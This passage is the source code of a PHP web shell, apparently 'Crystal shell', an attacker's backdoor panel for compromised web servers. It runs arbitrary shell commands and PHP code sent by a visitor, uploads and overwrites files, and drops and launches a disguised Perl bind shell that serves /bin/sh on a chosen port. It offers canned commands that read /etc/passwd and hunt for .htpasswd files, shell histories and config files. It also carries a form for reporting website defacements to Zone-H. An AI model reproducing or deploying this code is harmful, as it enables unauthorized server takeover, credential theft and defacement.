  499. }
  500.  
  501. // copy//
  502. $u1p="";
  503. $tymczas="";
  504. if(empty($_POST['copy'])){
  505. } else {
  506. $u1p=$_POST['copy'];
  507. $temp=tempnam($tymczas, "cx");
  508. if(copy("compress.zlib://".$u1p, $temp)){
  509. $zrodlo = fopen($temp, "r");
  510. $tekst = fread($zrodlo, filesize($temp));
  511. fclose($zrodlo);
  512. echo "".htmlspecialchars($tekst)."";
  513. unlink($temp);
  514. } else {
  515. die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
  516. <B>".htmlspecialchars($u1p)."</B> dosen't exists or you don't have
  517. access.</CENTER></FONT>");
  518. }
  519. }
  520.  
  521. @$dir = $_POST['dir'];
  522. $dir = stripslashes($dir);
  523.  
  524. @$cmd = $_POST['cmd'];
  525. $cmd = stripslashes($cmd);
  526. $REQUEST_URI = $_SERVER['REQUEST_URI'];
  527. $dires = '';
  528. $files = '';
  529.  
  530.  
  531.  
  532.  
  533. if (isset($_POST['port'])){
  534. $bind = "
  535. #!/usr/bin/perl
  536.  
  537. \$port = {$_POST['port']};
  538. \$port = \$ARGV[0] if \$ARGV[0];
  539. exit if fork;
  540. $0 = \"updatedb\" . \" \" x100;
  541. \$SIG{CHLD} = 'IGNORE';
  542. use Socket;
  543. socket(S, PF_INET, SOCK_STREAM, 0);
  544. setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
  545. bind(S, sockaddr_in(\$port, INADDR_ANY));
  546. listen(S, 50);
  547. while(1)
  548. {
  549.     accept(X, S);
  550.     unless(fork)
  551.     {
  552.         open STDIN, \"<&X\";
  553.         open STDOUT, \">&X\";
  554.         open STDERR, \">&X\";
  555.         close X;
  556.         exec(\"/bin/sh\");
  557.     }
  558.     close X;
  559. }
  560. ";}
  561.  
  562. function decode($buffer){
  563.  
  564. return  convert_cyr_string ($buffer, 'd', 'w');
  565.  
  566. }
  567.  
  568.  
  569.  
  570. function execute($com)
  571. {
  572.  
  573.  if (!empty($com))
  574.  {
  575.   if(function_exists('exec'))
  576.    {
  577.     exec($com,$arr);
  578.    echo implode('
  579. ',$arr);
  580.    }
  581.   elseif(function_exists('shell_exec'))
  582.    {
  583.     echo shell_exec($com);
  584.  
  585.  
  586.    }
  587.   elseif(function_exists('system'))
  588. {
  589.  
  590.     echo system($com);
  591. }
  592.   elseif(function_exists('passthru'))
  593.    {
  594.  
  595.     echo passthru($com);
  596.  
  597.    }
  598. }
  599.  
  600. }
  601.  
  602.  
  603. function perms($mode)
  604. {
  605.  
  606. if( $mode & 0x1000 ) { $type='p'; }
  607. else if( $mode & 0x2000 ) { $type='c'; }
  608. else if( $mode & 0x4000 ) { $type='d'; }
  609. else if( $mode & 0x6000 ) { $type='b'; }
  610. else if( $mode & 0x8000 ) { $type='-'; }
  611. else if( $mode & 0xA000 ) { $type='l'; }
  612. else if( $mode & 0xC000 ) { $type='s'; }
  613. else $type='u';
  614. $owner["read"] = ($mode & 00400) ? 'r' : '-';
  615. $owner["write"] = ($mode & 00200) ? 'w' : '-';
  616. $owner["execute"] = ($mode & 00100) ? 'x' : '-';
  617. $group["read"] = ($mode & 00040) ? 'r' : '-';
  618. $group["write"] = ($mode & 00020) ? 'w' : '-';
  619. $group["execute"] = ($mode & 00010) ? 'x' : '-';
  620. $world["read"] = ($mode & 00004) ? 'r' : '-';
  621. $world["write"] = ($mode & 00002) ? 'w' : '-';
  622. $world["execute"] = ($mode & 00001) ? 'x' : '-';
  623. if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
  624. if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
  625. if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
  626. $s=sprintf("%1s", $type);
  627. $s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
  628. $s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
  629. $s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
  630. return trim($s);
  631. }
  632.  
  633.  
  634.  
  635.  
  636.  
  637.  
  638. if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "")
  639. {
  640. copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]);
  641. }
  642.  
  643. if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))
  644.  
  645. {
  646. $data = implode("", file($_POST['filefrom']));
  647. $fp = fopen($_POST['fileto'], "wb");
  648. fputs($fp, $data);
  649. $ok = fclose($fp);
  650. if($ok)
  651. {
  652. $size = filesize($_POST['fileto'])/1024;
  653. $sizef = sprintf("%.2f", $size);
  654. print "<center><div id=logostrip>Download - OK. (".$sizef."??)</div></center>";
  655. }
  656. else
  657. {
  658. print "<center><div id=logostrip>Something is wrong. Download - IS NOT OK</div></center>";
  659. }
  660. }
  661.  
  662. if (isset($_POST['installbind'])){
  663.  
  664. if (is_dir($_POST['installpath']) == true){
  665. chdir($_POST['installpath']);
  666. $_POST['installpath'] = "temp.pl";}
  667.  
  668.  
  669. $fp = fopen($_POST['installpath'], "w");
  670. fwrite($fp, $bind);
  671. fclose($fp);
  672.  
  673. exec("perl " . $_POST['installpath']);
  674. chdir($dir);
  675.  
  676.  
  677. }
  678.  
  679.  
  680. @$ef = stripslashes($_POST['editfile']);
  681. if ($ef){
  682. $fp = fopen($ef, "r");
  683. $filearr = file($ef);
  684.  
  685.  
  686.  
  687. $string = '';
  688. $content = '';
  689. foreach ($filearr as $string){
  690. $string = str_replace("<" , "&lt;" , $string);
  691. $string = str_replace(">" , "&gt;" , $string);
  692. $content = $content . $string;
  693. }
  694.  
  695. echo "<center><div id=logostrip>Edit file: $ef </div><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=content cols=100 rows=20>$content</textarea>
  696. <input type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
  697. <input type=\"hidden\" name=\"savefile\" value=\"{$_POST['editfile']}\"><br>
  698. <input type=\"submit\" name=\"submit\" value=\"Save\" id=input></form></center>";
  699. fclose($fp);
  700. }
  701.  
  702. if(isset($_POST['savefile'])){
  703.  
  704. $fp = fopen($_POST['savefile'], "w");
  705. $content = stripslashes($content);
  706. fwrite($fp, $content);
  707. fclose($fp);
  708. echo "<center><div id=logostrip>saved -OK!</div></center>";
  709.  
  710. }
  711.  
  712.  
  713. if (isset($_POST['php'])){
  714.  
  715. echo "<center><div id=logostrip>eval code<br><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=phpcode cols=100 rows=20></textarea><br>
  716. <input type=\"submit\" name=\"submit\" value=\"Exec\" id=input></form></center></div>";
  717. }
  718.  
  719.  
  720.  
  721. if(isset($_POST['phpcode'])){
  722.  
  723. echo "<center><div id=logostrip>Results of PHP execution<br><br>";
  724. @eval(stripslashes($_POST['phpcode']));
  725. echo "</div></center>";
  726.  
  727.  
  728. }
  729.  
  730.  
  731. if ($cmd){
  732.  
  733. if($sertype == "winda"){
  734. ob_start();
  735. execute($cmd);
  736. $buffer = "";
  737. $buffer = ob_get_contents();
  738. ob_end_clean();
  739. }
  740. else{
  741. ob_start();
  742. echo decode(execute($cmd));
  743. $buffer = "";
  744. $buffer = ob_get_contents();
  745. ob_end_clean();
  746. }
  747.  
  748. if (trim($buffer)){
  749. echo "<center><div id=logostrip>Command: $cmd<br><textarea cols=100 rows=20>";
  750. echo decode($buffer);
  751. echo "</textarea></center></div>";
  752. }
  753.  
  754. }
  755. $arr = array();
  756.  
  757. $arr = array_merge($arr, glob("*"));
  758. $arr = array_merge($arr, glob(".*"));
  759. $arr = array_merge($arr, glob("*.*"));
  760. $arr = array_unique($arr);
  761. sort($arr);
  762. echo "<table><tr><td>Name</td><td><a title=\"Type of object\">Type</a></td><td>Size</td><td>Last access</td><td>Last change</td><td>Perms</td><td><a title=\"If Yes, you have write permission\">Write</a></td><td><a title=\"If Yes, you have read permission\">Read</a></td></tr>";
  763.  
  764. foreach ($arr as $filename) {
  765.  
  766. if ($filename != "." and $filename != ".."){
  767.  
  768. if (is_dir($filename) == true){
  769. $directory = "";
  770. $directory = $directory . "<tr><td>$filename</td><td>" . filetype($filename) . "</td><td></td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
  771. if (is_writable($filename) == true){
  772. $directory = $directory . "<td>Yes</td>";}
  773. else{
  774. $directory = $directory . "<td>No</td>";
  775.  
  776. }
  777.  
  778. if (is_readable($filename) == true){
  779. $directory = $directory . "<td>Yes</td>";}
  780. else{
  781. $directory = $directory . "<td>No</td>";
  782. }
  783. $dires = $dires . $directory;
  784. }
  785.  
  786. if (is_file($filename) == true){
  787. $file = "";
  788. $file = $file . "<tr><td><a onclick=tag('$filename')>$filename</a></td><td>" . filetype($filename) . "</td><td>" . filesize($filename) . "</td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
  789. if (is_writable($filename) == true){
  790. $file = $file . "<td>Yes</td>";}
  791. else{
  792. $file = $file . "<td>No</td>";
  793. }
  794.  
  795. if (is_readable($filename) == true){
  796. $file = $file . "<td>Yes</td></td></tr>";}
  797. else{
  798. $file = $file . "<td>No</td></td></tr>";
  799. }
  800. $files = $files . $file;
  801. }
  802.  
  803.  
  804.  
  805. }
  806.  
  807.  
  808.  
  809. }
  810. echo $dires;
  811. echo $files;
  812. echo "</table><br>";
  813.  
  814.  
  815.  
  816.  
  817. echo "
  818. <form action=\"$REQUEST_URI\" method=\"POST\">
  819. Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\">
  820.  
  821.  
  822. Directory:<INPUT type=\"text\" name=\"dir\" size=30 value=\"";
  823.  
  824. echo getcwd();
  825. echo "\">
  826. <INPUT type=\"submit\" value=\"..Exec..\"></form>";
  827.  
  828.  
  829.  
  830.  
  831.  
  832. if (ini_get('safe_mode') == 1){echo "<br><font size=\"3\"color=\"#cc0000\"><b>SAFE MOD IS ON<br>
  833. Including from here: "
  834. . ini_get('safe_mode_include_dir') . "<br>Exec here: " . ini_get('safe_mode_exec_dir'). "</b></font>";}
  835.  
  836.  
  837.  
  838.  
  839. ?>
  840.  
  841.  
  842. </td></tr></table></p></td></tr></table>
  843.     </a><br><hr size="1" noshade><p align="right">
  844.     <font face="Wingdings 3" size="5" color="#DCE7EF">&lt;</font><b><select name="act"><option value="ls">
  845.     With selected:</option><option value="delete">Delete</option><option value="archive">
  846.     Archive</option><option value="cut">Cut</option><option value="copy">Copy</option><option value="unselect">
  847.     Unselect</option></select>&nbsp;<input type="submit" value="Confirm"></p></form></td></tr></table><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
  848. <tr><td width="100%" height="1" valign="top" colspan="2" bgcolor="#000000"><p align="center">
  849.     <b>
  850.     :: </b>
  851.     <font face=Verdana size=-2><a href="?act=command">Executed command</a></font><b> ::</b></p></td></tr><tr><td width="50%" height="1" valign="top" bgcolor="#000000" style="color: #000000; border: 1px solid #000000"><center><b>
  852.     <?
  853.     echo "
  854. <form action=\"$REQUEST_URI\" method=\"POST\">
  855. Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\">";
  856. ?>
  857.         <input type="submit" name="submit1" value="Command" style="border: 1px solid #000000"><font face="Wingdings 3" color="#DCE7EF" size="3">f</font></form><p>
  858.     &nbsp;</p>
  859.     </td>
  860.     <td width="50%" height="1" valign="top" bgcolor="#000000" style="color: #000000"><center>
  861.     <form action="?act=cmd" method="POST"><input type="hidden" name="act" value="cmd"><input type="hidden" name="d" value="c:/appserv/www/shells/">
  862.         <font color="#DCE7EF">Select</font><font face="Wingdings 3" color="#DCE7EF" size="3">g</font><select name="cmd" size="1"><option value="ls -la">
  863.         -----------------------------------------------------------</option>
  864.         <option value="ls -la /var/lib/mysq">ls MySQL</option>
  865.         <option value="which curl">cURL ?</option>
  866.         <option value="which wget">Wget ?</option>
  867.         <option value="which lynx">Lynx ?</option>
  868.         <option value="which links">links ?</option>
  869.         <option value="which fetch">fetch ?</option>
  870.         <option value="which GET">GET ?</option>
  871.         <option value="which per">Perl ?</option>
  872.         <option value="gcc --help">C gcc Help ?</option>
  873.         <option value="tar --help">tar Help ?</option>
  874.         <option value="cat /etc/passwd">Get passwd !!!</option>
  875.         <option value="cat /etc/hosts">Get hosts</option>
  876.         <option value="perl --help">Perl Help ?</option>
  877.         <option value="find / -type f -perm -04000 -ls">
  878.         find all suid files</option><option value="find . -type f -perm -04000 -ls">
  879.         find suid files in current dir</option><option value="find / -type f -perm -02000 -ls">
  880.         find all sgid files</option><option value="find . -type f -perm -02000 -ls">
  881.         find sgid files in current dir</option><option value="find / -type f -name config.inc.php">
  882.         find config.inc.php files</option><option value="find / -type f -name &quot;config*&quot;">
  883.         find config* files</option><option value="find . -type f -name &quot;config*&quot;">
  884.         find config* files in current dir</option><option value="find / -perm -2 -ls">
  885.         find all writable directories and files</option><option value="find . -perm -2 -ls">
  886.         find all writable directories and files in current dir</option><option value="find / -type f -name service.pwd">
  887.         find all service.pwd files</option><option value="find . -type f -name service.pwd">
  888.         find service.pwd files in current dir</option><option value="find / -type f -name .htpasswd">
  889.         find all .htpasswd files</option><option value="find . -type f -name .htpasswd">
  890.         find .htpasswd files in current dir</option><option value="find / -type f -name .bash_history">
  891.         find all .bash_history files</option><option value="find . -type f -name .bash_history">
  892.         find .bash_history files in current dir</option><option value="find / -type f -name .fetchmailrc">
  893.         find all .fetchmailrc files</option><option value="find . -type f -name .fetchmailrc">
  894.         find .fetchmailrc files in current dir</option><option value="lsattr -va">
  895.         list file attributes on a Linux second extended file system</option><option value="netstat -an | grep -i listen">
  896.         show opened ports</option></select><input type="hidden" name="cmd_txt" value="1">&nbsp;<input type="submit" name="submit" value="Execute" style="border: 1px solid #000000"></form></td></tr></TABLE><a bookmark="minipanel" href="?act=bind"><font face="Verdana" size="-2">Bind port to</font><font face="Webdings" size="5" color="#DCE7EF">Â</font></a><font color="#00FF00"><br>
  897. </font>
  898. <a bookmark="minipanel">
  899. <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
  900. <tr>
  901.  <td width="50%" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><form method="POST">
  902.     <p align="center">
  903. <a bookmark="minipanel">
  904.     <b><font face="verdana" color="red" size="4">
  905.     <a style="font-weight: normal; font-family: verdana; text-decoration: none" bookmark="minipanel">
  906.     <font face="verdana" size="2" color="#DCE7EF">::</font></a></font></b><a href="?act=edit" bookmark="minipanel"><span lang="en-us"><font face="Verdana" size="2">Edit/Create
  907.     file</font></span></a><b><font face="verdana" color="red" size="4"><a style="font-weight: normal; font-family: verdana; text-decoration: none" bookmark="minipanel"><font face="verdana" size="2" color="#DCE7EF">::</font></a></font></b><font face="Wingdings 2" size="2">&quot;</font></p><p align="center">
  908.     &nbsp;<?
  909. if ($act == "edit") {echo "<center><b>ÇáÊÍÑíÑ æÇáÇäÔÇÁ:<br><br> Þã ÈæÖÚ ÇÓã ÇáãáÝ ÇáÐí ÊÑíÏ ÊÍÑíÑå ÝÞØ<br>æÈÚÏ ÐÇáß ÇáÖÛØ Úáì config.php ãËÇá<br>Edit<br>ÓÊÙåÑ áß äÇÝÐå ÈåÇ ãÍÊæíÇÊ ÇáãáÝ <br>æÇíÖÇ ð ÇÐÇ ÇÑÏÊ ÇäÔÇÁ ãáÝ ÝÞØ ÖÚ ÇÓãå ãÚ ÇáÇãÊÏÇÏ <br>æÈÚÏ ÐÇáß ÇßÊÈ ãÇÊÑíÏ washer-crystal.txt   </a>.</b>";}
  910. ?>
  911.     </p>
  912.     <p>&nbsp;</p>
  913.     <p> <?
  914.     echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
  915. File to edit:
  916. <input type=\"text\" name=\"editfile\" >
  917. <INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
  918. <INPUT type=\"submit\" value=\"Edit\"></form></div>";
  919. ?>
  920.     </p>
  921.     </form></center></p></td>
  922.  <td width="50%" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center">
  923.                  <?
  924. if ($act == "upload") {echo "<center><b>ÑÝÚ ÇáãáÝÇÊ:<br><br>Þã ÈÊÍÏíÏ ÇáãáÝ ÇáãÑÇÏ ÑÝÚå <br>æÈÚÏ ÐÇáß Þã ÈÇáÖÛØ Úáì ÇáÎíÇÑ ÇáãæÖÍ<br>UPLOAD< </a>.</b>";}
  925. ?><a bookmark="minipanel"><b><font size="2">::
  926.     </font>
  927.     </b><a href="?act=upload"><span lang="en-us"><font face="Verdana" size="2">
  928.                     upload</font></span></a><b><font size="2">::</font></b><font face=Webdings size=2>&#325;</font><font size="2"></a></a></font><br><form method="POST" ENCTYPE="multipart/form-data"><input type="hidden" name="miniform" value="1"><input type="hidden" name="act" value="upload">&nbsp;
  929.         <?
  930.         echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
  931. <INPUT type=\"file\" name=\"userfile\">
  932. <INPUT type=\"hidden\" name=\"post\" value=\"yes\">
  933. <INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
  934. <INPUT type=\"submit\" value=\"Download\"></form></div>";
  935. ?>
  936.     <p></form></p></td>
  937.  
  938. </tr>
  939. </table>    <b>
  940. <font size=-2 face=verdana color="white">
  941.                   <p>&nbsp;<a href="?act=Defacer">Defacer Zone-H</a></font><p align="center">&nbsp;
  942. </p>
  943.                     <?
  944. if ($act == "Defacer") {echo "<center><b>CRYSTAL-H:<br><br>ÇÓã ÇáãÚáä Defacer<br>ÇáãæÞÚ ÇáãÎÊÑÞ Victim<br>æÖÚ ÇáÇÎÊÑÇÞ Çí äæÚ ÇáËÛÑå ÇáÊì ÇÓÊËãÑÊåÇ Attack Mode <br> ÓÈÈ ÇáÇÎÊÑÇÞ Attack Reason <br>áÇÑÓÇá ÇáÇÎÊÑÇÞ sand   <br> áÑÄíå ÇÎÑ ÇáÊÍÐíÑÇÊ ÇáãÑÓáå ÈÇáãæÞÚ Attacks On Hold</a>.</b>";}
  945. ?>                 <p align="center"><font face="Verdana" color="#CC0000">
  946.                   <SCRIPT language=JavaScript type=text/javascript>
  947.         <!--
  948.         function validate(){
  949.             document.notifyForm.action = "http://www.zone-h.org/component/option,com_notify/Itemid,89/task,single/"
  950.             document.notifyForm.submit();
  951.         }
  952.         //-->
  953.         </SCRIPT>
  954.  
  955.                   Defacer </font></font></font>
  956. <font face=Verdana color=#CC0000>
  957.                     Zone-h</font><FORM name=notifyForm
  958.                   action=http://www.zone-h.org/component/option,com_notify/Itemid,89/task,single/
  959.                   method=post>
  960.                   <TABLE class=contentpane cellSpacing=0 cellPadding=0
  961.                   width="100%" border=0>
  962.                     <TBODY>
  963.                     <!-- DESCRIPTION -->
  964.                     <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
  965.                       <TD style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa"></TD></TR><!-- INSTRUCTIONS -->
  966.                     </TBODY></TABLE>
  967.                   <TABLE cellSpacing=0 cellPadding=10 width="100%" border=0 style="color: #CC0000; border: 1px outset #000000; background-color: #000000">
  968.                     <TBODY>
  969.                     <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
  970.                       <TD align=left style="color: #DCE7EF; border: 1px solid #FFFFFF; background-color: #000000" bgcolor="#000000" bordercolorlight="#000000" bordercolordark="#000000">
  971.                         <TABLE width="100%" style="border: 1px outset #eeeeee; background-color: #EEEEEE">
  972.                           <TBODY>
  973.                           <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
  974.                             <TD style="border-left:1px solid #eeeeee; border-right:1px solid #aaaaaa; border-top:1px solid #eeeeee; border-bottom:1px solid #aaaaaa; BACKGROUND-COLOR: #000000"
  975.                               align=left><SPAN
  976.                               style="FONT-SIZE: 4px">&nbsp;</SPAN></TD></TR></TBODY></TABLE><!-- Input Form --><TABLE class=notifyForm width="100%">
  977.                           <TBODY>
  978.                           <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
  979.                             <TD noWrap align=left width="15%"
  980.                               height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000"><b><font size="1" color="#FF0000">
  981.                             ::Defacer::</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1">è</font></TD><TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
  982.                             <INPUT
  983.                               class=inputbox id=defacer style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE"
  984.                               maxLength=64 name=defacer size="1" value="Super-Crystal"> </font></font>
  985.                             </font></TD>
  986.                             <font size=-2 face=verdana color=white>
  987.                           <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
  988.                             <TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
  989.                             <b><font size="1" color="#FF0000">::Victim::</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1">è</font></TD><TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
  990.                             <INPUT
  991.                               class=inputbox id=domain style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE"
  992.                               maxLength=250 value=http://www.microsoft.com name=domain size="1"> </TD>
  993.                           <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
  994.                             <TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
  995.                             <b>
  996.                             <font color="#FF0000" size="1">Attack Mode</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1">è</font></TD><TD align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
  997.                             <SELECT class=inputbox
  998.                               style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE" name=method size="1"> <OPTION
  999.                                 value="" selected>choose</OPTION> <OPTION
  1000.                                 value=23>Access credentials through Man In the
  1001.                             Middle attack</OPTION><OPTION value=22>Attack
  1002.                             against the administrator/user (password
  1003.                             stealing/sniffing)</OPTION><OPTION value=29>DNS
  1004.                             attack through cache poisoning</OPTION><OPTION
  1005.                                 value=28>DNS attack through social engineering</OPTION><OPTION value=17>
  1006.                             File Inclusion</OPTION><OPTION value=9>FTP Server
  1007.                             intrusion</OPTION><OPTION value=8>Mail Server
  1008.                             intrusion</OPTION><OPTION value=30>Not available</OPTION><OPTION value=14>
  1009.                             Other Server intrusion</OPTION><OPTION value=18>
  1010.                             Other Web Application bug</OPTION><OPTION value=19>
  1011.                             Remote administrative panel access through
  1012.                             bruteforcing</OPTION><OPTION value=20>Remote
  1013.                             administrative panel access through password
  1014.                             guessing</OPTION><OPTION value=21>Remote
  1015.                             administrative panel access through social
  1016.                             engineering</OPTION><OPTION value=25>Remote service
  1017.                             password bruteforce</OPTION><OPTION
  1018.                                 value=24>Remote service password guessing</OPTION><OPTION value=26>
  1019.                             Rerouting after attacking the Firewall</OPTION><OPTION
  1020.                                 value=27>Rerouting after attacking the Router</OPTION><OPTION value=12>
  1021.                             RPC Server intrusion</OPTION><OPTION value=13>Shares
  1022.                             misconfiguration</OPTION><OPTION value=15>SQL
  1023.                             Injection</OPTION><OPTION value=10>SSH Server
  1024.                             intrusion</OPTION><OPTION value=11>Telnet Server
  1025.                             intrusion</OPTION><OPTION value=16>URL Poisoning</OPTION><OPTION value=7>
  1026.                             Web Server external module intrusion</OPTION><OPTION
  1027.                                 value=6>Web Server intrusion</OPTION></SELECT></TD></TR><TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
  1028.                             <TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
  1029.                             <b>
  1030.                             <font size="1" color="#FF0000">Attack Reason</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1">è</font></TD><TD align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
  1031.                             <SELECT class=inputbox
  1032.                               style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE" name=reason size="1"> <OPTION
  1033.                                 value="" selected>choose</OPTION> <OPTION
  1034.                                 value=4>As a challenge</OPTION><OPTION
  1035.                                 value=1>Heh...just for fun!</OPTION><OPTION
  1036.                                 value=5>I just want to be the best defacer</OPTION><OPTION value=7>
  1037.                             Not available</OPTION><OPTION
  1038.                                 value=6>Patriotism</OPTION><OPTION
  1039.                                 value=3>Political reasons</OPTION><OPTION
  1040.                                 value=2>Revenge against that website</OPTION></SELECT></TD></TR></TBODY></TABLE><TABLE width="100%" style="border: 1px outset #eeeeee; background-color: #EEEEEE">
  1041.                           <TBODY>
  1042.                           <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
  1043.                             <TD style="border-left:1px solid #eeeeee; border-right:1px solid #aaaaaa; border-top:1px solid #eeeeee; border-bottom:1px solid #aaaaaa; BACKGROUND-COLOR: #000000"
  1044.                               align=left><SPAN
  1045.                               style="FONT-SIZE: 4px">&nbsp;</SPAN></TD></TR></TBODY></TABLE><DIV style="CLEAR: both"></DIV>
  1046.                         <TABLE class=notifyForm width="100%">
  1047.                           <TBODY>
  1048.                           <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
  1049.                             <TD align=left style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa" bgcolor="#000000">
  1050.                             <INPUT class=button onclick=validate() type=button value=Send name=send style="color: #CC0000; border: 1px solid #C0C0C0; background-color: #EEEEEE">&nbsp;&nbsp;<b><font size=4 face="Wingdings 3">:</font></b>&nbsp;&nbsp;
  1051.                             </font></font>
  1052. <font size=6 face=Webdings color="#FF0000">L </font><b>
  1053.                             <a class="sublevel" href="http://www.zone-h.org/component/option,com_attacks/Itemid,45/">
  1054.                             <font color="#FF0000">Attacks On Hold</font></a></b><font color="#FF0000">
  1055.                             </font>
  1056. <font size=6 face=Webdings color="#FF0000">L</TD></TR></TBODY></TABLE><INPUT type=hidden
  1057.                         value=com_notify name=option style="font-family: Verdana; font-size: 10px; color: black; border: 2px solid black; background-color: #C0C0C0"></TR></TBODY></TABLE></FORM></font></b><br>
  1058. <br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
  1059.     <td width="990" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center">
  1060.     <b>
  1061.     &nbsp;</b><font face="Wingdings 3" size="5">y</font><b>Crystal shell v. 1 beta&nbsp; </b><font color="#CC0000"><b>©oded by</b> </font><b><a href="http://www.tryag.com">TrYaG Team</a> <span lang="en-us">l</span></b> <b><a href="?act=team">Arab Security Center Team</a> |<a href="http://www.secure4center.com"><font color="#DCE7EF">securityCenter</font></a>|
  1062.     : Web </b><font face="Wingdings 3" size="5">x</font></p><p align="center">&nbsp;</p></td></tr></table>
  1063.  
  1064. </a>
  1065.  
  1066.  
  1067. <div align="right">
  1068.  
  1069. <span lang="en-us">&nbsp; </span><TABLE cellSpacing=0 cellPadding=0 border=0>
  1070.   <TBODY>
  1071.   <TR>
  1072.     <TD align=middle style="font-family: verdana, arial, 'ms sans serif', sans-serif; font-size: 11px; color: #D5ECF9">
  1073.       <TABLE class=calendar_table cellSpacing=1 cellPadding=1>
  1074.         <TBODY>
  1075.         <TR>
  1076.           <TD class=calendar_month colSpan=7><span lang="en-us">CRYSTAL-<font color="#CC0000">H</font></span><font color="#CC0000">
  1077.             2006</font></TD></TR><TR>
  1078.           <TD class=calendar_days>P</TD><TD class=calendar_days>P</TD><TD class=calendar_days>S</TD><TD class=calendar_days>C</TD><TD class=calendar_days>P</TD><TD class=calendar_days>C</TD><TD class=calendar_days>C</TD></TR><TR>
  1079.           <TD class=calendar_day></TD>
  1080.           <TD class=calendar_day></TD>
  1081.           <TD class=calendar_day></TD>
  1082.           <TD class=calendar_day></TD>
  1083.           <TD class=calendar_day></TD>
  1084.           <TD class=calendar_day></TD>
  1085.           <TD class=calendar_day></TD></TR>
  1086.         <TR>
  1087.           <TD class=calendar_day></TD>
  1088.           <TD class=calendar_day></TD>
  1089.           <TD class=calendar_day></TD>
  1090.           <TD class=calendar_day></TD>
  1091.           <TD class=calendar_day></TD>
  1092.           <TD class=calendar_day></TD>
  1093.           <TD class=calendar_day>1 </TD></TR>
  1094.         <TR>
  1095.           <TD class=calendar_day>2 </TD>
  1096.           <TD class=calendar_day>3 </TD>
  1097.           <TD class=calendar_day><font color="#FF0000">4 </font> </TD>
